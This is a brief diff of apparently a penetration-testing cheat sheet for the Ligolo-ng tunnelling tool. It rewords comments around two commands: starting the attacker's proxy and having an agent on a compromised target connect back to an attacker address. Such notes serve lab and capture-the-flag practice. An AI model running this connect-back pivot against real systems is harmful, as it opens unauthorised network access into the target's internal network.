 Ligolo-ng

-# Attacker — start proxy
+# Attacker — start the proxy

 ./proxy -selfcert

-# Target — connect agent
+# Target — connect the agent back to the attacker

 ./agent -connect 10.10.14.5:11601 -ignore-cert